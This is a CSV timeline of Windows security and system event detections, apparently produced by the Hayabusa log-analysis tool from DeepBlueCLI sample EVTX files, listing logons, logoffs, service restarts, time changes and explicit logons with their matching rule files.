2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:52:14.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:54:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:06:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:33.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:54:10.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:29.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:04:18.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:25.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:41:16.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:42:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 10:43:32.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:07:37.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:51:44.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:52:38.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
